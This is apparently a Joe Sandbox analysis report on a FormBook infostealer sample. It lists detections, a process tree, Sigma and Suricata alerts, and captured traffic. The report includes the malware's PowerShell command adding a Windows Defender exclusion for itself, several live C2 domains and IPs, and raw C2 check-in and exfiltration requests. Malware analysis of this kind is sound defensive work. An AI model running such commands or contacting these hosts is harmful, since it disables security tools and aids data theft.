Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QmBbqpEHu0.exe

Overview

General Information

Sample name:QmBbqpEHu0.exe
renamed because original name is a hash value
Original sample name:80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89.exe
Analysis ID:1587945
MD5:eb7415c6ed5d31b69c535afeed1ad3ac
SHA1:11c7e7e4388044514f499bf63af99c6aebe14e13
SHA256:80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QmBbqpEHu0.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: EB7415C6ED5D31B69C535AFEED1AD3AC)
    • powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8136 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • QmBbqpEHu0.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: EB7415C6ED5D31B69C535AFEED1AD3AC)
      • cqvjCApYGBKzop.exe (PID: 4888 cmdline: "C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 2892 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • cqvjCApYGBKzop.exe (PID: 5780 cmdline: "C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7344 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.QmBbqpEHu0.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.QmBbqpEHu0.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QmBbqpEHu0.exe", ParentImage: C:\Users\user\Desktop\QmBbqpEHu0.exe, ParentProcessId: 7432, ParentProcessName: QmBbqpEHu0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", ProcessId: 7892, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QmBbqpEHu0.exe", ParentImage: C:\Users\user\Desktop\QmBbqpEHu0.exe, ParentProcessId: 7432, ParentProcessName: QmBbqpEHu0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", ProcessId: 7892, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QmBbqpEHu0.exe", ParentImage: C:\Users\user\Desktop\QmBbqpEHu0.exe, ParentProcessId: 7432, ParentProcessName: QmBbqpEHu0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", ProcessId: 7892, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:46:21.171227+010020507451Malware Command and Control Activity Detected192.168.2.449843172.247.112.16480TCP
                2025-01-10T19:46:49.387880+010020507451Malware Command and Control Activity Detected192.168.2.45001213.248.169.4880TCP
                2025-01-10T19:47:23.511477+010020507451Malware Command and Control Activity Detected192.168.2.450016156.253.8.11580TCP
                2025-01-10T19:47:36.864133+010020507451Malware Command and Control Activity Detected192.168.2.45002037.97.254.2780TCP
                2025-01-10T19:47:51.047350+010020507451Malware Command and Control Activity Detected192.168.2.450024199.193.6.13480TCP
                2025-01-10T19:48:18.386830+010020507451Malware Command and Control Activity Detected192.168.2.450028124.6.61.13080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: QmBbqpEHu0.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: QmBbqpEHu0.exeReversingLabs: Detection: 78%
                Source: QmBbqpEHu0.exeVirustotal: Detection: 63%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: QmBbqpEHu0.exeJoe Sandbox ML: detected
                Source: QmBbqpEHu0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: QmBbqpEHu0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: HszP.pdbSHA256 source: QmBbqpEHu0.exe
                Source: Binary string: finger.pdb source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cqvjCApYGBKzop.exe, 00000009.00000002.3586427956.000000000097E000.00000002.00000001.01000000.0000000D.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000000.2358690186.000000000097E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: HszP.pdb source: QmBbqpEHu0.exe
                Source: Binary string: wntdll.pdbUGP source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QmBbqpEHu0.exe, QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009BC9E0 FindFirstFileW,FindNextFileW,FindClose,10_2_009BC9E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax10_2_009A9E40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h10_2_032E04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49843 -> 172.247.112.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50016 -> 156.253.8.115:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 199.193.6.134:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 124.6.61.130:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 37.97.254.27:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.jgkgf.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hsa.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.sssvip2.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.dutchdubliners.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.allstary.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.comect.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.jgkgf.club
                Source: global trafficDNS traffic detected: DNS query: www.hsa.world
                Source: global trafficDNS traffic detected: DNS query: www.sssvip2.shop
                Source: global trafficDNS traffic detected: DNS query: www.dutchdubliners.online
                Source: global trafficDNS traffic detected: DNS query: www.allstary.top
                Source: global trafficDNS traffic detected: DNS query: www.16v9tiu00r.ink
                Source: global trafficDNS traffic detected: DNS query: www.comect.online
                Source: unknownHTTP traffic detected: POST /09b7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.hsa.worldOrigin: http://www.hsa.worldContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.hsa.world/09b7/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 45 59 61 68 58 4b 42 4a 71 55 52 54 36 4a 52 45 39 56 50 79 44 41 33 6d 79 39 33 45 44 2f 59 45 4c 6c 34 36 35 4d 43 48 32 39 6a 57 57 66 46 5a 78 48 64 76 44 76 71 58 64 4c 38 51 6b 4f 6c 58 43 38 2b 34 4a 4a 75 71 46 35 6e 63 77 39 65 73 4b 57 51 4c 71 72 30 63 76 6c 6a 72 6f 36 66 6a 62 69 41 59 4e 42 6a 4d 49 57 50 76 44 68 4d 61 37 53 30 66 37 67 62 45 6f 6e 6e 49 59 53 59 56 32 6c 54 42 7a 62 79 55 33 76 58 31 74 54 62 4e 53 4f 62 53 4f 32 79 69 34 4c 63 73 72 47 67 53 6e 7a 58 70 76 45 32 4f 59 41 54 31 78 69 4c 6f 64 49 58 57 77 3d 3d Data Ascii: EzZ=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:47:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:47:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:47:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not 